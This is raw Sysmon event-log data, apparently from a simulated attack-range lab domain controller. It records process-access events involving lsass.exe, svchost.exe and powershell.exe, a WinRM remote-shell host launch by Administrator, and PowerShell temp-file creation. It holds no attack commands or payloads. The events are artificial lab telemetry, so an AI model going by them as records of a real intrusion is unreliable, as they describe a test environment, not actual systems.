10341000x80000000000000003456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.644{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6497-6064-FF70-070000000000}0x770ff0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.643{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.627{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.627{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x80000000000000003446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.627{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F5C3D22B2A17FE5A066C855A0FB575CF,SHA256=FBF2107F9B504AA9AED40D099A2E40E4F69142CF5666EA6585CF0F434D72D16B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.518{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.518{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.518{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x80000000000000003442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.471{266CAFBE-6497-6064-8500-00000000AE01}712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.299{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.299{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000003439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:27.283{266CAFBE-6497-6064-8500-00000000AE01}712\PSHost.132616656871715378.712.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000003438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.268{266CAFBE-6497-6064-8500-00000000AE01}712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_it0jbgxr.xkh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.268{266CAFBE-6497-6064-8500-00000000AE01}712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rfopcqcl.12k.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000003436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.221{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rfopcqcl.12k.ps12021-03-31 12:01:27.221 10341000x80000000000000003435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.205{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.174{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.174{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000003431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-6497-6064-8300-00000000AE01}44724460C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 